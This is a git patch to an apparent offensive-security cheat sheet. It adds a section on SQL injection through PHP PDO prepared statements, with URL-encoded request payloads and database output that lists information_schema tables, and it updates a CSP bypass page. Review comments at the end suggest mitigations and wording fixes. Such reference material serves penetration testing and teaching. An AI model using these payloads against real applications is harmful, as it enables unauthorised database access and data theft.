From ac73b0c619b112c61f580e637576dd872b5d993d Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 26 Jul 2025 15:21:23 +0200 Subject: [PATCH] PDO Prepared Statements --- SQL Injection/README.md | 75 ++++++++++++++++++++++++++++++++- XSS Injection/4 - CSP Bypass.md | 12 +++--- 2 files changed, 81 insertions(+), 6 deletions(-) diff --git a/SQL Injection/README.md b/SQL Injection/README.md index 5bbe8ba..092d813 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -29,6 +29,7 @@ * [Polyglot Injection](#polyglot-injection) * [Routed Injection](#routed-injection) * [Second Order SQL Injection](#second-order-sql-injection) +* [PDO Prepared Statements](#pdo-prepared-statements) * [Generic WAF Bypass](#generic-waf-bypass) * [White Spaces](#white-spaces) * [No Comma Allowed](#no-comma-allowed) 
@@ -365,6 +366,77 @@ password="P@ssw0rd" Since you are inserting your payload in the database for a later use, any other type of injections can be used UNION, ERROR, BLIND, STACKED, etc. +## PDO Prepared Statements + +PDO, or PHP Data Objects, is an extension for PHP that provides a consistent and secure way to access and interact with databases. It is designed to offer a standardized approach to database interaction, allowing developers to use a consistent API across multiple types of databases like MySQL, PostgreSQL, SQLite, and more. + +PDO allows for binding of input parameters, which ensures that user data is properly sanitized before being executed as part of a SQL query. However it might still be vulnerable to SQL injections if the developers allowed user input inside the SQL query. + +**Requirements**: + +* DMBS + * **MySQL** is vulnerable by default. + * **Postgres** is not vulnerable by default, unless the emulation is turned on with `PDO::ATTR_EMULATE_PREPARES => true`. + * **SQLite** is not vulnerable to this attack. + +* SQL injection anywhere inside a PDO statement: `$pdo->prepare("SELECT $INJECT_SQL_HERE...")`. +* PDO used for another SQL parameter, either with `?` or `:parameter`. + + ```php + $pdo = new PDO(APP_DB_HOST, APP_DB_USER, APP_DB_PASS); + $col = '`' . str_replace('`', '``', $_GET['col']) . '`'; + + $stmt = $pdo->prepare("SELECT $col FROM animals WHERE name = ?"); + $stmt->execute([$_GET['name']]); + // or + $stmt = $pdo->prepare("SELECT $col FROM animals WHERE name = :name"); + $stmt->execute(['name' => $_GET['name']]); + ``` + +**Methodology**: + +**NOTE**: In PHP 8.3 and lower, the injection happens even without a null byte (`\0`). The attacker only needs to smuggle a "`:`" or a "`?`". 
+ +* Detect the SQLi using `?#\0`: `GET /index.php?col=%3f%23%00&name=anything` + + ```ps1 + # 1st Payload: ?#\0 + # 2nd Payload: anything + You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '`'anything'#' at line 1 + ``` + +* Force a select \`'x\` instead of a column name and create a comment. Inject a backtick to fix the column and terminate the SQL query with `;#`: `GET /index.php?col=%3f%23%00&name=x%60;%23` + + ```ps1 + # 1st Payload: ?#\0 + # 2nd Payload: x`;# + Column not found: 1054 Unknown column ''x' in 'SELECT' + ``` + +* Inject in second parameter the payload. `GET /index2.php?col=\%3f%23%00&name=x%60+FROM+(SELECT+table_name+AS+`'x`+from+information_schema.tables)y%3b%2523` + + ```ps1 + # 1st Payload: \?#\0 + # 2nd Payload: x` FROM (SELECT table_name AS `'x` from information_schema.tables)y;%23 + ALL_PLUGINS + APPLICABLE_ROLES + CHARACTER_SETS + CHECK_CONSTRAINTS + COLLATIONS + COLLATION_CHARACTER_SET_APPLICABILITY + COLUMNS + ``` + +* Final SQL queries + + ```SQL + -- Before $pdo->prepare + SELECT `\?#\0` FROM animals WHERE name = ? + + -- After $pdo->prepare + SELECT `\'x` FROM (SELECT table_name AS `\'x` from information_schema.tables)y;#'#\0` FROM animals WHERE name = ? + ``` + ## Generic WAF Bypass ### White Spaces 
@@ -461,12 +533,13 @@ Bypass using keywords case insensitive or an equivalent operator. ## References +* [A Novel Technique for SQL Injection in PDO’s Prepared Statements - Adam Kues - July 21, 2025](https://slcyber.io/assetnote-security-research-center/a-novel-technique-for-sql-injection-in-pdos-prepared-statements) * [Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection - Not So Secure - February 9, 2018](https://web.archive.org/web/20180209143119/https://www.notsosecure.com/analyzing-cve-2018-6376/) * [Implement a Blind Error-Based SQLMap payload for SQLite - soka - August 24, 2023](https://sokarepo.github.io/web/2023/08/24/implement-blind-sqlite-sqlmap.html) * [Manual SQL Injection Discovery Tips - Gerben Javado - August 26, 2017](https://gerbenjavado.com/manual-sql-injection-discovery-tips/) * [NetSPI SQL Injection Wiki - NetSPI - December 21, 2017](https://sqlwiki.netspi.com/) * [PentestMonkey's mySQL injection cheat sheet - @pentestmonkey - August 15, 2011](http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet) * [SQLi Cheatsheet - NetSparker - March 19, 2022](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/) -* [SQLi in INSERT worse than SELECT - Mathias Karlsson - Feb 14, 2017](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/) +* [SQLi in INSERT worse than SELECT - Mathias Karlsson - February 14, 2017](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/) * [SQLi Optimization and Obfuscation Techniques - Roberto Salgado - 2013](https://web.archive.org/web/20221005232819/https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2013/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf) * [The SQL Injection Knowledge base - Roberto Salgado - May 29, 2013](https://websec.ca/kb/sql_injection) diff --git a/XSS Injection/4 - CSP Bypass.md b/XSS Injection/4 - CSP Bypass.md index 4fd5f02..9fed2a5 100644 --- a/XSS Injection/4 - CSP Bypass.md 
+++ b/XSS Injection/4 - CSP Bypass.md @@ -4,7 +4,7 @@ ## Summary -- [CSP Detection](#csp-detection) +- [Tools](#tools) - [Bypass CSP using JSONP](#bypass-csp-using-jsonp) - [Bypass CSP default-src](#bypass-csp-default-src) - [Bypass CSP inline eval](#bypass-csp-inline-eval) @@ -16,9 +16,10 @@ - [Labs](#labs) - [References](#references) -## CSP Detection +## Tools -Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) and the post : [How to use Google’s CSP Evaluator to bypass CSP](https://websecblog.com/vulns/google-csp-evaluator/) +- [gmsgadget.com](https://gmsgadget.com/) - GMSGadget (Give Me a Script Gadget) is a collection of JavaScript gadgets that can be used to bypass XSS mitigations such as Content Security Policy (CSP) and HTML sanitizers like DOMPurify. +- [csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) - CSP Evaluator allows developers and security experts to check if a Content Security Policy (CSP) serves as a strong mitigation against cross-site scripting attacks. ## Bypass CSP using JSONP 
@@ -173,5 +174,6 @@ Source: [@pilvar222](https://twitter.com/pilvar222/status/1784618120902005070) ## References - [Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities - Brett Buerhaus (@bbuerhaus) - March 8, 2017](https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/) -- [D1T1 - So We Broke All CSPs - Michele Spagnuolo and Lukas Weichselbaum - 27 Jun 2017](http://web.archive.org/web/20170627043828/https://conference.hitb.org/hitbsecconf2017ams/materials/D1T1%20-%20Michele%20Spagnuolo%20and%20Lukas%20Wilschelbaum%20-%20So%20We%20Broke%20All%20CSPS.pdf) -- [Making an XSS triggered by CSP bypass on Twitter - wiki.ioin.in(查看原文) - 2020-04-06](https://www.buaq.net/go-25883.html) +- [D1T1 - So We Broke All CSPs - Michele Spagnuolo and Lukas Weichselbaum - June 27, 2017](http://web.archive.org/web/20170627043828/https://conference.hitb.org/hitbsecconf2017ams/materials/D1T1%20-%20Michele%20Spagnuolo%20and%20Lukas%20Wilschelbaum%20-%20So%20We%20Broke%20All%20CSPS.pdf) +- [How to use Google’s CSP Evaluator to bypass CSP - Thomas Orlita - September 9, 2018](https://websecblog.com/vulns/google-csp-evaluator/) +- [Making an XSS triggered by CSP bypass on Twitter - wiki.ioin.in(查看原文) - April 6, 2020](https://www.buaq.net/go-25883.html)
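Review bot: In the PDO Prepared Statements hunk of `SQL Injection/README.md` (@@ -365,6 +366,77 @@) the Requirements list spells the DBMS bullet "DMBS", and the MySQL line ("**MySQL** is vulnerable by default.") never says why, which is the one fact a reader needs to fix the problem: pdo_mysql enables client-side prepare emulation by default, so the Postgres bullet's `PDO::ATTR_EMULATE_PREPARES => true` condition already applies to MySQL out of the box. Suggest adding the mitigation right after the requirements, e.g. "Set `PDO::ATTR_EMULATE_PREPARES => false` so placeholders are parsed by the database rather than by PDO, and never interpolate user input into the query text; backtick-quoting `$col` as in the snippet does not prevent this, so validate column names against an allowlist instead." The line "PDO allows for binding of input parameters, which ensures that user data is properly sanitized" overstates it: bound values are sent separately (native prepares) or escaped client-side (emulated prepares); rewording to "kept out of the query text" avoids the suggestion that binding sanitizes anything. The NOTE "In PHP 8.3 and lower, the injection happens even without a null byte" leaves the reader guessing what changed afterwards; either state the behaviour in later versions or point at the Assetnote reference that documents it. Two smaller points: "Inject in second parameter the payload." should read "Inject the payload in the second parameter.", and the three blocks that show MariaDB error messages and query results are fenced as ```ps1 although none of them is PowerShell; ```text matches the rest of the file.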
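Review bot: Renaming the heading in the Summary hunk of `XSS Injection/4 - CSP Bypass.md` (@@ -4,7 +4,7 @@, `-- [CSP Detection](#csp-detection)` / `+- [Tools](#tools)`) changes the fragment `#csp-detection`; any other page in the repository that links to it will now point at nothing. Suggest grepping for `csp-detection` across the repo before merging and updating those links in the same commit.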
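Review bot: The Tools hunk (@@ -16,9 +16,10 @@) drops the caveat that sat next to the CSP Evaluator link. The removed line paired the tool with "[How to use Google's CSP Evaluator to bypass CSP]", i.e. a warning that a policy the evaluator rates as strong can still be bypassable; the new bullet describes CSP Evaluator only as a tool that "allows developers and security experts to check if a Content Security Policy (CSP) serves as a strong mitigation", and the post is moved to the References list at the bottom where a reader scanning the Tools section will not see it. Suggest keeping a short clause on the csp-evaluator bullet ("its verdict can be misleading, see the Thomas Orlita post in References") so the caveat stays next to the tool it qualifies. The gmsgadget.com bullet reads fine.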
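Review bot: In the References hunk (@@ -173,5 +174,6 @@) the entry "Making an XSS triggered by CSP bypass on Twitter - wiki.ioin.in(查看原文) - April 6, 2020" still carries "wiki.ioin.in(查看原文)" in the author slot; "查看原文" is the aggregator's "view original" link label, not an author, and the other entries in this list use a person or organisation there. Since this line is already being edited for the date format, suggest replacing the author field with the actual author of the post (or the site name alone if the author is unknown) so the list stays consistent with the "Title - Author - Month D, YYYY" pattern the rest of the hunk enforces.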